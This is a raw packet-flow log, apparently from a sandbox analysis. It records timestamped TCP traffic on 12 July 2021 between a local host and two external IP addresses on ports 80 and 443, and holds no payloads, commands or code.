Jul 12, 2021 10:29:45.879483938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.879508972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.879519939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.879544973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.879568100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.879579067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.880407095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.880477905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.880521059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.880551100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.880577087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.880595922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.880613089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.880626917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.880656958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881140947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881211042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.881237030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881263018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881285906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881308079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.881325006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881334066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.881356001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.881807089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.881999016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.882229090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.882256031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.882280111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.882301092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.882330894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.882354975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.882371902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.882400036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.132086039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.170394897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198479891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198506117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198520899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198538065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198563099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198571920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198585033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198605061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198618889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198631048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198642969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198656082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198667049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198683023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198694944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198704958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198719025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198729038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198743105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198751926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198766947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198781967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198788881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198807955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198820114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198831081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198843002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198856115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198867083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198878050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198889971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198900938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198911905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198921919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198931932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198947906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198960066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198967934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.198982000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.198992014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199004889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199019909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199031115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199035883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199052095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199069023 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199075937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199095964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199103117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199145079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199156046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199178934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199194908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199217081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199229956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199249029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199269056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199279070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199295998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199311972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199322939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199335098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199342966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199357986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199374914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199383020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199399948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199419022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199435949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199443102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199474096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.199800968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.199852943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200022936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200227022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200256109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200273991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200313091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200320959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200345039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200366974 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200406075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200416088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200475931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200499058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200515985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200552940 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200612068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200618029 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200640917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.200750113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.200903893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201144934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201198101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201236963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201261997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.201272964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201303005 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.201344013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201570034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201587915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201610088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201647997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.201673031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201697111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.201705933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.201724052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202092886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202112913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202189922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202243090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202259064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202274084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202289104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202315092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202342033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202347994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202440023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202474117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202487946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202512980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202524900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202554941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202600956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.202620029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202635050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.202697992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.203013897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203032970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203092098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203110933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.203246117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203263044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203320980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.203330040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203346968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203361988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203401089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.203421116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203427076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.203443050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203459024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.203500986 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.203982115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204160929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204180956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204201937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204224110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204252958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204260111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.204278946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.204297066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204320908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204339981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204360008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204382896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204390049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.204415083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.204440117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.204452991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204515934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.204588890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.205024958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205048084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205063105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205079079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205091000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205144882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.205168009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.205246925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205296993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205303907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.205331087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205354929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205377102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205394030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.205459118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.205495119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.205991983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206012964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206087112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206094027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.206132889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206141949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.206187010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206202984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206235886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.206268072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206295967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206343889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.206381083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206470966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.206481934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206499100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206511021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206522942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.206546068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.206579924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.207195044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207232952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207254887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207293034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207305908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.207325935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207343102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207350969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.207372904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207389116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207401037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207431078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.207452059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207473040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207483053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.207515001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.207901001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.207964897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.208045006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.208204031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.208245993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.208268881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.208282948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.208306074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.208328962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.208394051 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.208811045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.277004004 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:46.460143089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.460249901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.502908945 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:46.503011942 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:46.504905939 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:46.731107950 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:46.731153011 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:46.731851101 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:46.931838036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:46.934161901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:46.959770918 CEST	443	49756	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:46.960021019 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:46.961004019 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:46.965519905 CEST	49756	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.026925087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.048990965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049046993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049062014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049077988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049092054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049112082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049128056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049165010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049189091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049194098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049209118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049223900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049232006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049249887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049263000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049279928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049324036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049784899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049823999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049843073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049860001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049876928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049889088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049907923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049925089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049942970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.049964905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.049978018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050139904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.050331116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050381899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050399065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050429106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050441980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.050468922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.050489902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050507069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050544024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.050581932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050599098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050632000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050641060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.050673008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050755978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050795078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.050801992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.050836086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.051139116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051328897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051347971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051362991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051378965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051389933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.051426888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.051433086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.051508904 CEST	80	49755	47.254.186.176	192.168.2.3
